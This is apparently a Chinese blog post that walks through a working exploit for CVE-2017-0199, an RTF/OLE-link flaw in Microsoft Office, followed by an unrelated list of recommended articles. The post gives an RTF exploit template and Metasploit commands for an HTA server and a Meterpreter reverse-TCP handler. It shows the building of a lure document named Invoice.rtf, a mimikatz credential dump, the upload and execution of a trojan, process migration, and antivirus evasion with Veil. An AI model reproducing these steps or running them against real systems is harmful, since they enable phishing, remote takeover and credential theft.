一大早就各种消息弹框,于是就来测试一波

https://github.com/nixawk/metasploit-framework/blob/8ab0b448fdce15999f155dfd7b22479e5f79de3a/modules/exploits/windows/fileformat/ms17_0199_rtf.rb

增加如下文件:/usr/share/metasploit-framework/data/exploits/cve-2017-0199.rtf

{\rtf1\adeflang1025\ansi\ansicpg1252\uc1\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi31507\deflang1033\deflangfe2052\themelang1033\themelangfe2052\themelangcs0

{\info

{\author CVE-2017-0199}

{\operator CVE-2017-0199}

}

{\*\xmlnstbl {\xmlns1 http://schemas.microsoft.com/office/word/2003/wordml}}

{

{\object\objautlink\objupdate\rsltpict\objw291\objh230\objscalex99\objscaley101

{\*\objclass Word.Document.8}

{\*\objdata 0105000002000000

090000004f4c45324c696e6b000000000000000000000a0000

d0cf11e0a1b11ae1000000000000000000000000000000003e000300feff0900060000000000000000000000010000000100000000000000001000000200000001000000feffffff0000000000000000ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff

ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff

ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff

ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff

fffffffffffffffffdfffffffefffffffefffffffeffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff

ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff

ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff

ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff

ffffffffffffffffffffffffffffffff52006f006f007400200045006e00740072007900000000000000000000000000000000000000000000000000000000000000000000000000000000000000000016000500ffffffffffffffff020000000003000000000000c000000000000046000000000000000000000000704d

6ca637b5d20103000000000200000000000001004f006c00650000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000a000200ffffffffffffffffffffffff00000000000000000000000000000000000000000000000000000000

000000000000000000000000f00000000000000003004f0062006a0049006e0066006f00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000120002010100000003000000ffffffff0000000000000000000000000000000000000000000000000000

0000000000000000000004000000060000000000000003004c0069006e006b0049006e0066006f000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000014000200ffffffffffffffffffffffff000000000000000000000000000000000000000000000000

00000000000000000000000005000000b700000000000000010000000200000003000000fefffffffeffffff0600000007000000feffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff

ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff

ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff

ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff

ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff

MINISTREAM_DATA

0105000000000000}

{\result {\rtlch\fcs1 \af31507 \ltrch\fcs0 \insrsid1979324 }}}}

{\*\datastore }

}

use exploit/windows/misc/hta_server

run

[*] Started reverse TCP handler on 192.168.31.122:4444
[*] Using URL: http://0.0.0.0:8080/6gOqrxRSEWc3LB.hta
[*] Local IP: http://192.168.31.122:8080/6gOqrxRSEWc3LB.hta

会自动监听端口

其实也可以:

use exploits/multi/handler

set PAYLOAD windows/meterpreter/reverse_tcp

set LHOST 192.168.31.122

set LPORT 4444

run

use exploit/windows/fileformat/ms17_0199

set TARGETURI http://192.168.31.122:8080/6gOqrxRSEWc3LB.hta

set FILENAME haha.doc

run

load mimikatz

msv

cd d:\

upload /root/muma.exe

execute -f muma.exe

据测试下来,成功率不是很高。

2.

测试第二波

apt-get install veil-evasion(kali2安装veil会血崩) 生成一个免杀 use 35

python cve-2017-0199_toolkit.py -M gen -w Invoice.rtf -u http://192.168.56.1/logo.doc

msfconsole -x "use multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 192.168.56.1; run"

msfconsole -r /var/lib/veil-evasion/output/handlers/payload_handler.rc

python cve-2017-0199_toolkit.py -M exp -e http://192.168.56.1/shell.exe -l /tmp/shell.exe

msf接收多个session

exploit -j  后台监听
set ExitSession false

ps

迁移进程

migrate 4396

ms17_0199样本测试的更多相关文章

  1. 用2263份证件照图片样本测试how-old.net的人脸识别

    上一年也就是这个时候微软根据自己的人脸识别API推出了一个识别照片中人脸年龄和性别的网站--http://how-old.net,小伙伴们各种玩耍,一年后的今天突发"奇想"地想测试 ...

  2. 使用caffemodel模型(由mnist训练)测试单张手写数字样本

    caffe中训练和测试mnist数据集都是批处理,可以反馈识别率,但是看不到单张样本的识别效果,这里使用windows自带的画图工具手写制作0~9的测试数字,然后使用caffemodel模型识别. 1 ...

  3. 字符型图片验证码识别完整过程及Python实现

    字符型图片验证码识别完整过程及Python实现 1   摘要 验证码是目前互联网上非常常见也是非常重要的一个事物,充当着很多系统的 防火墙 功能,但是随时OCR技术的发展,验证码暴露出来的安全问题也越 ...

  4. Mallet 使用说明

    Mallet:自然语言处理工具包 发表于128 天前 ⁄ 技术, 科研 ⁄ 评论数 6 ⁄ 被围观 1006 Views+ MALLET是基于java的自然语言处理工具箱,包括分档得分类.句类.主题模 ...

  5. libsvm参数学习和核函数使用(转载)

    一.参数说明 English libsvm_options: -s svm_type : set type of SVM (default 0) 0 -- C-SVC        1 -- nu-S ...

  6. [小北De编程手记] : Lesson 02 玩转 xUnit.Net 之 基本UnitTest & 数据驱动

    关于<玩转 xUnit.Net>系列文章,我想跟大家分享的不是简单的运行一下测试用例或是介绍一下标签怎么使用(这样的文章网上很多).上一篇<Lesson 01 玩转 xUnit.Ne ...

  7. Libsvm自定义核函数【转】

    1. 使用libsvm工具箱时,可以指定使用工具箱自带的一些核函数(-t参数),主要有: -t kernel_type : set type of kernel function (default 2 ...

  8. ANTLR3完全参考指南读书笔记[08]

    前言 不要让用户被那些“专业术语”吓住! 用心设计的提示和反馈信息是软件设计者的“职业良心”.   内容 1 存在哪些错误? 2 美化错误提示 3 错误恢复策略   1 存在哪些错误? 在DSL语言开 ...

  9. Learning Theory

    Empiricial Risk Minimization 统计学习理论是整个机器学习到框架.试想我们学习的目的是什么呢?当然是为了具备用合理的方式处理问题的能力.统计学习理论要解决的问题就是基于数据找 ...

随机推荐

  1. php_network_getaddresses: getaddrinfo failed

    在使用 file_get_contents远程请求url时,出现警告:php_network_getaddresses: getaddrinfo failed: Name or servicenot ...

  2. App架构设计:接口的设计

    安全机制的设计 现在,大部分App的接口都采用RESTful架构,RESTFul最重要的一个设计原则就是,客户端与服务器的交互在请求之间是无状态的,也就是说,当涉及到用户状态时,每次请求都要带上身份验 ...

  3. 1. 参数的传入和添加 argparse.ArgumentParser()

    # Edit configuration 传入的参数使用的是--file_dir picture, 获取使用的是argv.file_dir import argparse, sys def parse ...

  4. leetcode241 为运算表达式设计优先级

    class Solution(object): def diffWaysToCompute(self, input): """ :type input: str :rty ...

  5. python安装的各种问题

    在windows上安装python下载mis安装即可. 环境用elipse即可,需要下载pydev插件,配置解释器. 如需用到matplotlib,安装顺序为matplot,numpy,dateuti ...

  6. 1-RadioButton控件的用法

      RadioButton控件 单选按钮,当与其他单选按钮成对出现时,允许用户从一组选项中选择单个选项.也就是说,当同一个容器中(Form.Panel.GroupBox.PictureBox等)存在两 ...

  7. 正向代理与反向代理以及Nginx【总结】(转)

    今天在了解Nginx的时候,涉及到反向代理的问题,看到一篇博文写的清晰明了,转载记录一下,后续继续学习,再次感谢博主的分享. 原文地址:https://www.cnblogs.com/Anker/p/ ...

  8. nodejs 之简单web服务器

    1.service.js var http=require('http');//引入http模块 var fs=require('fs');//fs模块 var path=require('path' ...

  9. Spring Boot 中使用 WebSocket 实现一对多聊天及一对一聊天

    为什么需要WebSocket? 我们已经有了http协议,为什么还需要另外一个协议?有什么好处? 比如我想得到价格变化,只能是客户端想服务端发起请求,服务器返回结果,HTTP协议做不到服务器主动向客户 ...

  10. SSM项目——乐淘商城话述1.0

    乐淘商城 项目介绍 淘淘网上商城是一个综合性的B2C平台,类似京东商城.天猫商城.会员可以在商城浏览商品.下订单,以及参加各种活动.管理员.运营可以在平台后台管理系统中管理商品.订单.会员等.客服可以 ...